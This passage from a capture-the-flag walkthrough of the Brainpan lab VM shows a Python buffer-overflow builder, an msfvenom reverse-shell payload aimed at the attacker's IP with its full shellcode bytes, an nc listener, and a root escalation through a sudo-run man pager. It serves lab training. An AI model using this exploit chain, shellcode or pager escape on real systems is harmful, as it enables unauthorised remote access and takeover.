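                 nop_len=16, badchars=BADCHARS):
    """Assemble junk | ret | NOP sled | shellcode and sanity-check it.

    Raises ValueError if the return address or the shellcode contains a
    bad character, since such a buffer would be truncated by strcpy.
    """
    ret_bytes = struct.pack("<I", ret)   # 0x311712F3 -> b"\xf3\x12\x17\x31"
    for name, part in (("return address", ret_bytes), ("shellcode", shellcode)):
        bad = find_badchars(part, badchars)
        if bad:
            raise ValueError("%s contains bad chars: %s"
                             % (name, ", ".join("\\x%02x" % b for b in bad)))
    buf = b"A" * offset + ret_bytes + b"\x90" * nop_len + shellcode
    assert buf[offset:offset + 4] == ret_bytes
    return buf


def layout(buf, offset=OFFSET):
    """Describe where each region sits, for a quick check before sending."""
    return {
        "eip_at": offset,
        "eip_bytes": buf[offset:offset + 4].hex(),
        "esp_lands_at": offset + 4,
        "total": len(buf),
    }


# Constructed sample in msfvenom's C format (NOT a real payload).
SAMPLE_C_OUTPUT = '''unsigned char buf[] =
"\\xcc\\xcc\\xcc\\xcc"
"\\x90\\xcc";'''

if __name__ == "__main__":
    sc = parse_c_buf(SAMPLE_C_OUTPUT)
    buf = build_buffer(sc)
    print(layout(buf))
    try:
        build_buffer(b"\x31\xc0\x00\x90")   # contains a NUL -> rejected
    except ValueError as exc:
        print("rejected:", exc)
```

The same build_buffer call serves Step 30: only the shellcode argument changes when the Windows payload is swapped for the Linux one, because the offset and the JMP ESP address come from brainpan.exe itself, not from the operating system underneath it.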
Step 28: We will run our exploit now. Before running it, start a listener on the attacking machine on the LPORT used when generating the shellcode:
nc -nvlp 1234
Step 29: Run the exploit. We have a reverse shell on our WinXP test machine!
Exhibit 16
Step 30: Now we need to generate new shellcode for Linux and run the same exploit against the Brainpan machine (192.168.43.205). brainpan.exe runs under Wine on the Linux VM, so the offset of 524 and the JMP ESP address inside brainpan.exe stay the same, but the shellcode must make Linux system calls. We swap the payload for linux/x86/shell_reverse_tcp, keep \x00 as a bad character, and point the script's host at the VM.
#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.43.204 LPORT=1234 R -e x86/alpha_upper -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 205 (iteration=0)
x86/alpha_upper chosen with final size 205
Payload size: 205 bytes
Final size of c file: 886 bytes
unsigned char buf[] =
"\x89\xe6\xd9\xe1\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x36\x51\x39\x4b\x4c\x37\x4d\x33"
"\x56\x33\x31\x53\x30\x53\x33\x5a\x54\x42\x4c\x49\x4b\x51\x58"
"\x30\x53\x56\x58\x4d\x4d\x50\x4a\x33\x46\x39\x58\x30\x47\x4f"
"\x58\x4d\x4b\x30\x30\x49\x52\x59\x4b\x49\x45\x38\x49\x50\x4f"
"\x58\x36\x4b\x38\x4c\x43\x58\x45\x52\x55\x50\x34\x44\x48\x52"
"\x4b\x39\x4b\x51\x48\x30\x32\x46\x50\x50\x50\x51\x50\x53\x4e"
"\x53\x35\x53\x4d\x59\x4b\x51\x38\x4d\x4d\x50\x56\x32\x52\x48"
"\x52\x4e\x56\x4f\x42\x53\x42\x48\x33\x58\x46\x4f\x46\x4f\x45"
"\x32\x32\x49\x4d\x59\x4d\x33\x51\x42\x50\x53\x4d\x59\x4b\x51"
"\x4e\x50\x54\x4b\x38\x4d\x4d\x50\x41\x41";
Step 31: We now have a low-privileged shell on the victim machine, as the user puck. Let's continue.
Exhibit 17
Step 32: We'll take a look in the home directory to see if there is anything interesting... nope. The only noticeable things are a script that restarts the web service should it die, and the document root of the web service running on port 10000. Let us check whether we can run anything with sudo:
#sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
Step 33: First upgrade to a proper TTY with python -c "import pty; pty.spawn('/bin/bash')". Running sudo /home/anansi/bin/anansi_util with no arguments prints its usage, and the manual [command] option stands out immediately: it opens the man page for [command], and because the whole program runs as root through sudo, so does the pager it spawns. Let's see if we can use that to run a command with root privileges (a pager such as less, which man uses, lets you run a shell command with !, and that command inherits root).
Exhibit 18
Bingo!! We have root access.
Exhibit 20
Hope you learned and enjoyed it!!